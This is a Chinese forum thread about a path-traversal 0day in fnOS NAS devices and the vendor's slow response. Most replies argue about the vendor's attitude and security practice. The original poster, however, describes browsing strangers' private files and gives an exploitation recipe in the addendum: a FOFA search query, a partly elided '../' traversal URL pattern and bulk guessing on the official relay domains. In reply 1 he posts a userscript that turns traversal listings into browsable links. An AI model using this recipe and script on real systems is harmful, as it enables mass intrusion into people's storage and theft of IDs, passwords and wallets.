请不要把任何和邀请码有关的内容发到 NAS 节点。
邀请码相关的内容请使用 /go/in 节点。
如果没有发送到 /go/in,那么会被移动到 /go/pointless 同时账号会被降权。如果持续触发这样的移动,会导致账号被禁用。
邀请码相关的内容请使用 /go/in 节点。
如果没有发送到 /go/in,那么会被移动到 /go/pointless 同时账号会被降权。如果持续触发这样的移动,会导致账号被禁用。
8 年群晖正版老用户,今年做了个愚蠢的动作,出了用着极其稳定的群晖,换成 8 盘位飞牛,原因是系统开放,飞牛影视体验还不错。
昨天的 飞牛 0Day 事件之后,从各个社区、群获取到的信息看到了以下场面:
官方处理态度
- 官方在极力掩饰,即使大量技术细节已被爆出的情况下,还在装死;
- 漏洞能够追溯到 0.9 ,且飞牛有能力来尽快通知用户的情况下,仍然未关闭 fn connect ,目前根据扫描情况推算,仍有超过 90%的用户停留在 1.1.15 之前的版本,所有数据被看光光;
目前 0Day 导致的问题:
- 公开到外网,能够直接访问的飞牛 NAS ,如果没有更新到最新的 1.1.15 版本,通过路径穿越漏洞可以被入侵者用极低的成本拿到 NAS 中的所有文件;
- 即使没有公开到外网,fn connect 如果开启,依然能够通过官方 fn connect 来实现上面的入侵,隐私全面泄露。我尝试了一些常见的 name ,基本上全部成功看到了 NAS 中的照片、文件,甚至还看到了许多比特币钱包备份和恢复文件;
- 基于上面的漏洞能够获取到用于登陆 cookie 加密计算的私钥,随便让 AI 搞了下,可以搞定模拟登陆,进入到用户 NAS 并进行任意操作。目前看了被种马的都是通过这个路径~
- 大量隐私、配置文件泄露,即使亡羊补牢,仍然会有很多隐患。例如我翻到了一个用户自部署的 Bitwaden 服务端及密码导出文件 json;
- 很多飞牛用户挂载了网盘,通过这个漏洞可以直接访问已挂载的网盘文件~
决定
- 立即断网飞牛,并在以后完全不再尝试。不是不能接受漏洞问题,而是官方态度决定了这个产品的上限。
- 检查与隐私相关的其他服务,如果是来自于非知名厂商的产品,立即开始寻找替代品。
- 告知身边所有还在使用飞牛服务的朋友,立即放弃;
这应该是亲身经历的最大规模的一次普通人信息泄露了。最近几天应该有大量的黑灰产玩家在全网扫描,获取资源了。
这是第一次呼吁大家放弃一个本来我在支持的一个产品。希望未来有个开源的 NAS 替代来满足需要吧~
第 1 条附言 · 8 小时 23 分钟前
居然还有洗地的。。。
今天凌晨发布的公告依然还在试图逃避问题和隐瞒真实情况。
我感觉很多人仍然没有意识到这玩意儿的恐怖啊。
打开 fofa ,搜索 title="飞牛 fnOS",列表里看到的 ip 和 port ,拼接某个地址(可以自行寻找方法,大致就是`{$ip}:{$port}/app-center-static/servic............../../`)
刚刚测试了下,能够查看到全部文件的概率在 92%。几乎每个都有身份证照片、各种密钥、全部设备相册同步、工作文档等等
完全没有任何门槛,如果再炸裂一点,不用在 fofa 搜索,直接打开 fnos.net 或者 5ddd.com ,官方提供的映射服务,随便试几个常用的单词组合,有能力的可以批量扫描,就可以直接连上 nas ,操作如上。这个总不能怪用户自己把服务暴露到公网了吧。
再次重申,不是不能容忍问题,不可接受的是态度和方法。这次暴露出来的问题证明了飞牛团队不具备处理这类问题的能力,在此类与用户隐私极其相关的基础设施提供方的所有能力影响里,这个是最致命的。
也许未来还会回归,那需要他们自己证明给所有人看。
今天凌晨发布的公告依然还在试图逃避问题和隐瞒真实情况。
我感觉很多人仍然没有意识到这玩意儿的恐怖啊。
打开 fofa ,搜索 title="飞牛 fnOS",列表里看到的 ip 和 port ,拼接某个地址(可以自行寻找方法,大致就是`{$ip}:{$port}/app-center-static/servic............../../`)
刚刚测试了下,能够查看到全部文件的概率在 92%。几乎每个都有身份证照片、各种密钥、全部设备相册同步、工作文档等等
完全没有任何门槛,如果再炸裂一点,不用在 fofa 搜索,直接打开 fnos.net 或者 5ddd.com ,官方提供的映射服务,随便试几个常用的单词组合,有能力的可以批量扫描,就可以直接连上 nas ,操作如上。这个总不能怪用户自己把服务暴露到公网了吧。
再次重申,不是不能容忍问题,不可接受的是态度和方法。这次暴露出来的问题证明了飞牛团队不具备处理这类问题的能力,在此类与用户隐私极其相关的基础设施提供方的所有能力影响里,这个是最致命的。
也许未来还会回归,那需要他们自己证明给所有人看。
 |
1
ucaime OP 这个简单的油猴脚本就可以正常浏览用户泄露文件了
```Javascript // ==UserScript== // @name 路径遍历链接修复工具 // @namespace http://tampermonkey.net/ // @version 1.0 // @description 修复特定路径下的 LFI/目录遍历链接拼接问题 // @author xxx // @match *://*/app-center-static/serviceicon/myapp/%7B0%7D/* // @grant none // ==/UserScript== (function() { 'use strict'; // 获取当前页面的查询参数,即 ?size=../../../../ 部分 const currentSearch = window.location.search; // 获取当前页面的基础路径,即 /app-center-static/serviceicon/myapp/%7B0%7D/ const currentPath = window.location.pathname; // 选取所有的 <a> 标签 const links = document.querySelectorAll('a'); links.forEach(link => { // 获取 HTML 中原本的 href 属性值(例如 "vol1/" 或 "bin"),而非浏览器解析后的完整 URL const rawHref = link.getAttribute('href'); if (rawHref) { // 核心逻辑:基础路径 + 原有查询参数 + 目标文件路径 // 结果:.../myapp/%7B0%7D/?size=../../../../vol1/ const newUrl = currentPath + currentSearch + rawHref; // 修改链接的指向 link.href = newUrl; } }); console.log(`已修正 ${links.length} 个路径遍历链接。`); })(); ``` |
 |
2
Puteulanus 20 小时 0 分钟前
系统开放是怎么来的 😂,感觉飞牛那个系统不是封闭得一逼
群晖自己系统和套件都有 API 文档,套件不管是手动上传安装,还是第三方源,也能算是开放;飞牛现在第三方用的包括影视的 API 好像都是逆向出来的,套件也刚加入手动上传安装没多久吧,加之前就只能装官方商店的 飞牛影视是好用,我之前给朋友那边虚拟机装了一个,远程挂载媒体库嫖它个播放器,然后有了媒体库更新之后飞牛的影视库没法及时刷新的问题,想找找它刷新媒体库的 API ,发现压根没有开放的,基本上你就是得实现它签名的算法模拟它 App 来操作,发了个帖子问了下也没后文了 https://club.fnnas.com/forum.php?mod=viewthread&tid=45408 |
 |
3
NyanMisaka 19 小时 41 分钟前 via iPhone
@Puteulanus 理念不等于实践,听说过 OpenAI 吗,可太 Open 了😅
|
 |
4
LnTrx 17 小时 8 分钟前
fnOS 的 nginx 日志在 /usr/trim/nginx/logs/access.log ,可以借此查看有多少人来“共襄盛举”了
|
 |
5
fishcat 16 小时 49 分钟前 via Android
为什么不继续用群晖了群晖是有啥问题吗
|
 |
6
someonesnone 15 小时 57 分钟前
一直都在用群晖
|
 |
7
xuromky 15 小时 21 分钟前 via Android
我看又发布了新版本
|
 |
8
sn0wdr1am 15 小时 20 分钟前  1
飞牛看起来确实伤人心,操作跟鸵鸟一样,遇到危险,把头埋在土里。
|
 |
9
liyouran 15 小时 19 分钟前 via Android
从 fnos 发布就在关注,在虚拟机上试了下,不符合我的习惯就再没用过,还好没用|ʘᗝʘ|。fn 的权限管理也很抽象,感觉文件管理也乱乱的应用商店下的 APP 配置文件都找不到。
推荐等 fnos 啥时候出和 cloudflare 一样的故障分析报告了再考虑用吧 |
 |
10
ClutchBear01 14 小时 35 分钟前
我没有登录 fn connect 就没事了吧.
|
|
11
ClutchBear01 14 小时 34 分钟前
 我 fn connect 没有打开, 说明不受这个漏洞影响对吧. |
 |
12
nothing2 14 小时 28 分钟前 via iPad
@ClutchBear01 网上一搜有很多办法监测是否泄露
|
 |
13
shuiduoduo 14 小时 15 分钟前 via iPhone
基于上面的漏洞能够获取到用于登陆 cookie 加密计算的私钥,随便让 AI 搞了下,可以搞定模拟登陆,进入到用户 NAS 并进行任意操作。目前看了被种马的都是通过这个路径~
这个是如何计算的 |
 |
14
Augix 14 小时 10 分钟前 via Android 2
https://mp.weixin.qq.com/s/LzkLcy92m5O24up_9c4NUA 凌晨 4 点已经发公告了。
顺便一提:没有绝对安全的系统/软件,谁也不知道哪里埋了个 0day 漏洞。 最佳实践就是不要暴露任何服务到公网,只使用 VPN 访问内网服务。必须暴露到公网的服务也使用 Docker 以非 root 权限运行,并且严格控制访问权限。 |
 |
15
cornorj6 13 小时 56 分钟前
真没必要一踩一捧,我同时拥有群晖和飞牛。群晖更像给企业级用户使用的,飞牛更加现代化更加贴近普通用户。应该影响没那么大,不开公网就没事。能开公网做端口转发的,应该是平时喜欢折腾的人,看到消息肯定第一时间升级了。最安全的还是平时开个 VPN 去访问内网,不管是飞牛还是群晖,这样最保险。
|
 |
16
zzycreate 13 小时 56 分钟前 via Android
绿联有类似问题么
|
 |
17
dfdd1811 13 小时 51 分钟前
没事老哥 8 年比我久点,我 918 ,人官方说现在就是最后一个版本了。未来如果不给更新了,有新漏洞也未必给修。换飞牛虽然官方可能装死,但毕竟是装死,还是能给你修的。这么想你就不觉得你更换产品的动作有问题嘞
|
 |
18
goodryb 13 小时 49 分钟前
还好就内网用下,备份完照片就关掉
|
 |
19
dilidilid 13 小时 34 分钟前 via iPhone 1
这影响还不大……评论区这宽容度也太高了吧,他们知不知道官方的 FNconnect 也一样被爆破,总不能说开 FNID 的也是爱折腾的用户所以活该?
|
 |
20
Valid 13 小时 31 分钟前
隐私泄漏的各位希望能积极维权,争取自身权益
|
 |
21
Logtous 13 小时 25 分钟前 4
这就是国内软件开发团队面临的舆情现状 一会造神一会拉踩 能不能笃定一点 给他们一点耐心和发展的空间 群晖发展多少年用户样本多少,早期面对的竞争和客户环境比现在好多多少 现在能有一群热爱 nas 的国人打造一款黑群晖平替 出了一点问题就在这里要死要活的 是不是把有情怀的开发者都逼死才甘心 ( manus 出走很多人也是这种心态 现在看到人家拿到了投资又是各种爽)
|
 |
24
zhenghuaiyu 13 小时 15 分钟前 1
一天到晚在这带节奏,到时候 fnos 真的被搞死了,还有的用么
|
|
26
someonesnone 13 小时 8 分钟前 via Android 1
@Logtous 再等等用户的小照片和加密币钱包就都被摸走了
|
|
27
zhenghuaiyu 13 小时 7 分钟前
@Valid 自己选的免费软件,就算泄露了 也是自己选择的锅,自己愿意用不成熟的产品 关产品方什么关系,人家没有从你这获取一分利益
|
 |
28
blueboyggh 13 小时 4 分钟前 via Android
@Logtous “国产”在这个站是有原罪的,何况飞牛是抢了一堆人心中“信仰”的饭碗的,所以现在这个情况很正常,也跟飞牛自己应对不利有关系,毕竟不是完整的商业化团队,只能说是成长中的必经之路
|
|
29
Logtous 13 小时 4 分钟前
@Valid 估计新的开发任务都挺满的 安全问题只能慢慢修 这个在开源(免费)项目挺常见的 刚刚看了下飞牛 os 下载前的用户须知,里面的第 4 条明确提出:
账号与网络安全防护:如您的 NAS 暴露于公网环境,请务必妥善管理系统账号,避免使用弱密码,并开启必要的安全防护措施(如双重验证、IP 限制等),降低潜在风险。 |
|
30
dilidilid 13 小时 3 分钟前 10
@Logtous 这个 case 是 12 月底在论坛被提出,而且明确是路径穿越漏洞,一个多月无人理睬,后期明显知道这个严重安全漏洞没有任何作为而是反过来忽悠用户,我不知道这跟国内国外有啥关系,如果是美国厂家这搞法不被喷烂?
只要稍微懂技术的人看到目前各方的报告可以很明确的判断问题归属了,还要等官方定性?那可太好了,官方直接像之前一样定性成 HTTP 中间人攻击不就行了,质疑的人有官方懂吗? |
|
31
dilidilid 13 小时 0 分钟前 7
@Logtous 你如果想对这个事情发表看法,至少请完整看过事件经过再来指责别人吧?还是说你都不知道咋回事就基于价值观开始激扬文字了呢
“请务必妥善管理系统账号,避免使用弱密码,并开启必要的安全防护措施”,这不是屁话吗,这次的漏洞只要能公网访问登陆页面就能直接访问所有用户文件,跟系统账号、弱密码、双重验证都没有任何关系 |
 |
32
kkwa56188 13 小时 0 分钟前
谢谢, 没用过, 不过现在记下了.
|
 |
33
kulove 12 小时 58 分钟前 via Android 2
@zhenghuaiyu 合着飞牛没卖硬件是吧?
|
|
34
kulove 12 小时 56 分钟前 via Android 1
@Logtous 老实说 这种 0day 级别的问题 这种态度在任何项目上都是不可取的 另外飞牛开源难道不是有一部分原因是因为要卖硬件么?
|
|
35
Logtous 12 小时 53 分钟前
@dilidilid 你只看到了弱密码,没看到括号里面的“IP 限制”建议吗?我同样是 nas 用户,我一直都有使用代理( wireguard )防范安全问题,家庭服务器开发公网本身就容易被扫这个不一直是常识吗?
|
|
36
dilidilid 12 小时 49 分钟前 4
@Logtous FNConnect 也被爆破了,而这是飞牛官方推荐的外网访问方式,你的意思是开启的用户也都是活该?这次事情就是严格按照飞牛官方的 guideline 去配置也会被全盘爆破,而且是极其容易复现、要求几乎没有的攻击方式,这在整个 NAS 系统历史上都是极其罕见(我不知道上一次是谁,印象中不太有),所以我不同意你说的“用户对 FNOS 太苛刻”的观点
|
 |
37
PrinceofInj 12 小时 49 分钟前 via Android 2
@Logtous 你仔细看看其他的帖子,只要你的 NAS 登录着飞牛账号,开了 fn connect ,哪怕设一万位密码都没用。
|
 |
38
jukanntenn 12 小时 41 分钟前 2
@cornorj6 FNconnect 照样中招呀。除了几个爱折腾的自己组网的,大量用飞牛的用户肯定都开 FNconnect 。我可能运气好,可能因为 fnid 设置的是随机字符串没被扫出来。
|
 |
39
AkinoKaedeChan 12 小时 41 分钟前 via Android 3
@Valid 别黑老贾了,人家也没装死不回应啊
|
|
40
Logtous 12 小时 37 分钟前
@dilidilid
@PrinceofInj 我都看了,也知道你们说的这个问题,我是程序员,这种问题一看就明白,我并不是说这个不是问题,我的意思给官方多点耐心,不要这么偏激带节奏的一棍子打死,明明是一个很好的产品,都是在大家的见证下一步步完善,并且不断追赶群晖这些老的完善的系统,这种追赶式的开发肯定不会像群晖一样一步一步暴露出问题不断修复变得稳定,很多飞牛的功能都是大家急着催出来的,比如这种远程访问在产品本身都还不完善的情况下开发出来就是吃力不讨好冒大风险的但还是做了 |
 |
41
a9htdkbv 12 小时 31 分钟前 via Android 6
@Logtous 做错了就要立正挨打,当年宝塔的 pma 漏洞,官方一发现就立刻打补丁,通过短信等多种渠道通知客户升级。飞牛这次呢?偷偷修复掩盖问题避重就轻,明明是眼看实在捂不住了才不得不公告,12 月就反馈的问题 2 月才公告升级,还只是在社媒公告,没有去提醒用户
|
 |
42
coolcoffee 12 小时 30 分钟前
@Logtous 现在是娱乐至死的世界,猛吹和猛踩都能吸引大量流量。唯独客观理性的分析没流量,因为需要脑子。
乌合之众都忙着站队,仿佛只要站了队就能占领道义的制高点,而且喜欢找软柿子来捏证明自己的正确性。 Windows 远程桌面、macOS 、群晖、OpenSSH 都有出现过或低级或高级的越权漏洞,但他们不敢喷,因为头部品牌的用户群体能把他们反喷死。 |
 |
43
lscho 12 小时 29 分钟前 via Android 4
@Logtous 不明白要给官方多少耐心。。。都 2 个多月了,漏洞刚出来的时候时候没人指责过官方什么问题吧?装死装了 2 个月不处理,这才是问题的关键
|
|
44
PrinceofInj 12 小时 27 分钟前 via Android
@Logtous 飞牛刚出来的时候有人在这里宣传,有人冷嘲热讽,我虚拟机装了一下试了试后感觉还行,还为他说过一些好话。但是目前这种情况下,飞牛暂时处理不了尚未升级的,应该立刻出一个公告,至少暂时把 fn connect 下掉,防止用户的数据被简单暴露。
|
|
45
a9htdkbv 12 小时 27 分钟前 via Android 1
@coolcoffee 这些软件出现问题后,官方也是收到反馈捂着不说等到舆论爆炸的时候不得不说吗?
|
 |
46
kierankihn 12 小时 23 分钟前 5
@coolcoffee Windows 远程桌面、macOS 、群晖、OpenSSH 哪个除了漏洞装死一个月,还忽悠用户没有漏洞的?
|
|
47
kulove 12 小时 15 分钟前 via Android 4
@coolcoffee 你是真能洗 不和你一样想法的都是乌合之众是吧 再者又不是做自媒体 这流量要了有何用?
另外 软件肯定都会有 bug 说的是态度 ok 刚才的这些你能举个例子吗? 我举个和飞牛这次差不多的例子 之前 nextjs 出 0day 是怎么做的?补丁第一时间出 同时 vercel 和 clouddlare 这种云厂商也在第一时间进行了拦截 飞牛呢?官方的 fn connect 第一时间拦截了吗?这是对用户负责吗?买 NAS 不就是为了安心吗? |
 |
49
RobinHuuu 11 小时 56 分钟前 via Android
这种小团队做的非开源网络穿透相关产品也敢用的人,真是勇士。
|
|
50
Logtous 11 小时 50 分钟前 1
@lscho
@PrinceofInj 前面我主要是想回应 op 这种拉踩的,至于他们应对问题的态度以及定性的迟缓,这个确实该挨批的。侧面反映出团队在转正式版后的心态没有及时转变,网安能力很欠缺也是很明显的。(感受到了国产就是原罪的威力,后续不再回复) |
|
51
coolcoffee 11 小时 25 分钟前
@kulove 飞牛对待漏洞的态度是有问题,但是不至于一棒子打死。我是觉得很多人一开始就选择错了,非得通过踩飞牛来证明自己没错。别人又还没盈利,没必要恨不得置之死地而后快。
从飞牛主打的的影音功能和 FN Connect 大流量套餐都说明它面向的娱乐方向,拿它存重要资料就要有相应的心理准备。很多用户想要便利又想要安全还想要不花钱,用飞牛且开公网就是取的免费和便利两者,自然安全性上就会大打折扣。 你作为网安,那肯定知道很多企业内部系统都会有大量漏洞吧?企业的做法只能是通过内网来减少攻击面,针对有员工敢用 frp 、ngrok 暴露导致内网遭受攻击的员工是发现就直接开除,而不会去苛责是不是内部系统有漏洞导致遭受攻击。 我觉得飞牛最大的问题还是将专业的设备推向了小白,小白有了隐私和便利可以都要的错觉,只要用户贪图便利而公网直通,哪怕是群晖也不能保证 2014 年的 SynoLocker 不会重演, 被打成筛子只是时间问题, |
|
52
kulove 11 小时 19 分钟前 via Android 3
@coolcoffee 我说了 软件都会有漏洞 所以主要是看处理问题的速度以及解决问题的态度 这么严重的问题 这么处理很明显是不合格的
|
|
53
kulove 11 小时 15 分钟前 via Android 4
@coolcoffee 我觉得最大的问题 就是冷处理 影响面扩大 说到底还是态度问题 然后也不能解释为何官方的 fn connect 不能做个拦截 个人需要通知更新 那么官方提供的服务 难道做不到拦截吗 不应该拦截吗
|
 |
54
Kirkcong 11 小时 13 分钟前
@zhenghuaiyu #24 truenas 也可以用的,虽然不好用,总比泄漏信息强,很多 nas 里是存有关键照片的。
|
 |
55
bowencool 11 小时 9 分钟前
本来还想玩玩的,现在也没必要了。。。
|
 |
56
jakes 10 小时 36 分钟前 8
也没人说“国产是原罪”啊,不是都只是不满意飞牛官方的处理态度吗?
上面怎么一直有“在这个站国产是原罪”呢?都是程序员了,做到就事论事很难吗?为什么一上来就扯什么国产,上“爱国武器”?当鸵鸟就能变好是吗? 我也上个月群晖转飞牛,在论坛里反馈了很多问题,感觉他们处理起来就是慢,提 BUG 或需求要一个星期贴子才会通过审核。 一些 NAS 系统常见的功能实现方式,在飞牛这里非要“自研”,比如分享路径、无用户目录、用户 ID 、NFS 不支持团队。实现方式看不出团队是“NAS 发烧友”,完全是没用过 NAS 的草台班子。 |
 |
57
wonderfulcxm 10 小时 23 分钟前
更新到 1.1.18,飞牛 TV 连不上了。。。
|
 |
58
int80 10 小时 16 分钟前 via Android
没有什么所谓的国产是原罪,路径依赖罢了
|
 |
59
MiKing233 10 小时 3 分钟前
@wonderfulcxm 我刚测过 OS 1.1.18 到 TV 1.1.6 没问题, 电视是 Android TV
|
 |
61
yolyzhu 9 小时 34 分钟前 2
当年我问都自组 nas 了还有什么是 linux+docker 搞不定的服务,为啥非要装飞牛。一堆人教育我说是为了飞牛的外网访问,这下求锤得锤了。
|
 |
62
l1ve 9 小时 0 分钟前 1
我还在考虑群辉转飞牛,但这个态度... 有点难评了
NAS 这种东西本身安全性就是第一位的,就这,算了吧 |
 |
63
C64NRD 8 小时 55 分钟前 1
从目前了解到的信息来看,飞牛团队处理问题的方式和态度挺令人失望的。
|
|
64
dilidilid 8 小时 45 分钟前 via iPhone 3
楼上那位朋友替飞牛辩护了不少,但飞牛直到现在这个时间点依然没对 fn connect 做任何定向阻断。
不发正式公告以及全平台推送我勉强理解为小公司的苦衷,那作为 fn connect 的运营方检测到问题版本的主机直接静默阻断然后重定向到系统更新总是举手之劳吧?就这他也没有做,对得起你的信任吗? 要知道飞牛唯一收钱的软件服务就是这个 fn connect 的内网穿透,我到现在已经完全无法理解这家公司的行为逻辑了 |
 |
65
AmericanExpress 8 小时 11 分钟前 via iPhone 4
这么严重的 0day 用捂盖子的方法处理真让我怀疑这些人在正经公司工作过没…
|
 |
66
atrexl 7 小时 54 分钟前
还好,我平常都是路由器禁止 nas 联网,端口用了反代,没有开通 fnc 。
|
 |
67
ImINH 7 小时 28 分钟前
我倒不是洗地,我单纯觉得这是选择的代价,安全的成本很高,但是一个售价很低而且很多人还用的免费的系统和自己的硬件,作为商业公司这么来维护安全呢?我虽然觉得处理方式很消极,但是也在情理之中。
|
 |
68
dushixiang 7 小时 2 分钟前 3
只能靠忽悠小白用户来割韭菜了,反正不发公共就没漏洞,等过一段时间大家都不关注的时候,就会有不明真相的用户来洗地了。
“这是高级功能,本来就不适合小白用。” “安全是用户的责任。” “加 WAF 就好了。” “被扫到是因为你暴露在公网。” “你没开 HTTPS ,被劫持怪谁?” “这是中间人攻击,不是我们的问题。” “80/443 本来就不该监听。” “换个高位端口就安全了。” “免费版本来就不保证安全。” “安全是一个相对概念。” “你要这么说,Linux 也有漏洞。” |
|
69
dushixiang 7 小时 1 分钟前
@dushixiang 公共 -> 公告
|
 |
70
catazshadow 6 小时 55 分钟前
当时就说了国产信不过,回旋镖这么快
|
 |
71
kingfire 6 小时 45 分钟前
闭源,国产,商业软件,buff 加满了
|
 |
72
suyuyu 6 小时 23 分钟前
国产闭源,我看都懒得看
|
|
73
AkinoKaedeChan 6 小时 17 分钟前
@dushixiang #68 话说有人说高位端口的,这个是最不靠谱的,上 FOFA 搜一下就能看到很多 50000 以上的端口被扫描到了
|
 |
74
ysicing 6 小时 11 分钟前
我不明白,为啥跑着 nginx 还占了 80 端口,手动改了,一重启就恢复了。/usr/trim/nginx/
|
 |
75
docx 6 小时 11 分钟前 via iPhone
国产公司基本操作了
|
 |
76
zhanhanker 6 小时 5 分钟前
用了检测脚本我的被挂木马了
|
 |
77
simplove 6 小时 4 分钟前
我能想到的正常操作是第一时间关闭 fn 远程访问并重定向到某个页面说明情况,让客户关闭服务检查是否中招,稍后更新版本。
而不是像现在这样遮遮掩掩。 |
|
78
wonderfulcxm 5 小时 52 分钟前 via iPhone
@MiKing233 更新服务器上的飞牛播放器就正常了,也是昨天发布的新版本
|
 |
80
SenLief 5 小时 47 分钟前
fnc 是收费的功能,这么大的安全漏洞下,fn 那边都不先重定向,这个不应该是低版本直接拒绝访问并重定向到更新版本的。
|
 |
81
obeykarma 5 小时 30 分钟前
@zhenghuaiyu #24 这话好熟悉,到时候 D 被搞没了,谁来管我们
|
 |
82
qianlongzt 5 小时 21 分钟前 2
|
 |
83
coolair 5 小时 7 分钟前
确实很危险。
还好我的飞牛里面只存了一样东西,那就是“片子”,没装 Docker ,没部署任何 self-hosted 的服务,没存任何个人相关的文件。 哈哈,看吧看吧,大家一起看。 |
 |
84
allplay 5 小时 6 分钟前
|
 |
85
Cambrian07 4 小时 54 分钟前
@SenLief #80 是的,这个是能做到的,是好处大于坏处的。不知道为什么 fn 团队不做这个事情。
|
|
87
SenLief 4 小时 9 分钟前
@Cambrian07 而且 ns 论坛那边有人发现,即使更新到了 115 的那个什么版本,漏洞依然没有被修复,或者说修复的可能不是同一个漏洞。
|
|
89
ucaime OP @coolair 这并不能避免影响。现在的这俩漏洞不只是可以看到和拿到你的文件,还可以肆意乱搞,当成肉鸡或者挖矿都是小事,还可以开内网的洞,影响面可就不是这一台机器这么简单了。
|
 |
90
evan9527 3 小时 46 分钟前
这是国人的正常操作,系统是个好系统,人不是好人。
|
|
92
ucaime OP @qianlongzt 所以一直到现在,还有非常多仍然受到影响的。有意思的是可以看到飞牛自带 nginx 的日志,找了几个分析了下,早就被轮了无数遍了。
https://imgur.com/a/ObaURjs |
 |
94
phithon 3 小时 28 分钟前
我搜了一下评论区是谁先提到“国产”这个词的。。。
|
 |
95
Apllex 3 小时 15 分钟前
评论区那些洗地的思路清奇啊
|
 |
96
h19981126g 3 小时 13 分钟前
笑死,当年威联通被渗透的时候你们可不是这么说的🤣
|
 |
97
yeh 2 小时 57 分钟前
@zhenghuaiyu
自己选的免费软件 ✅,就算泄露了 也是自己选择的锅✅,自己愿意用不成熟的产品✅ 关产品方什么关系✅,人家没有从你这获取一分利益❌ 本来最后一句我没什么想法,不过飞牛这操作,不好说了。 可能你看中的是利息,人家看的本金。 毕竟钱包什么的…… 比辛苦卖 fn connect 赚多了 |
 |
98
aker91 2 小时 20 分钟前
我主要看 b 站和 v ,看了大部分评论,我是真觉得目前的论调有些过于严苛了
主流 nas 系统我几乎都用过,飞牛刚发布没多久我就用上了,我是在 truenas 虚拟机中用的飞牛,用的 ddns 反代 + https ,目前还没发现感染现象。 以前的 nas 系统大多确实很难用,简洁易用的功能又太简单,飞牛在刚发布时候我是真的感觉眼前一亮的,迭代也很快,虽然更新过程给我带来好几次问题,但最后都解决了,我用 nas 主要是备份和虚拟机,但是飞牛影视易用性做的很好,所以我现在也开始给孩子存些动画片看。 我看十个骂的八个是在说态度,说实话在我看来,它真不是个什么大型团队,碰到这个事慌了,怂了不是人之常情吗?难道指望有专业公关团队吗?当众认错真是挺难的一件事,论迹不论心,更新修复也没慢到要千刀万剐的地步吧? 安全这事真的是栽了才能重视,飞牛活着绝对比死了要好,这系统能更新到现在,绝对是有热情在的,如果要换系统,我推荐 truenas+linux 虚拟机然后跑 docker ,足够用了,我对国产系统没什么青睐,也没什么偏见,只是单纯觉得做的没有评价的那么糟而已,所以我还会用下去,毕竟人又没收我钱 我以前刚运维 k8s 的时候,也出过大问题,亏的时间是凌晨,在用户多之前处理完了,我至今对当时状态记忆犹新:瞬间清醒,浑身大汗,如遭雷击。处理完上线后,客户没问,我也没提,但要是问了,我也不能保证百分百诚实。 |
 |
99
laikicka 2 小时 19 分钟前
鬼知道是不是故意埋的 0day 方便审查呢
|
Select Language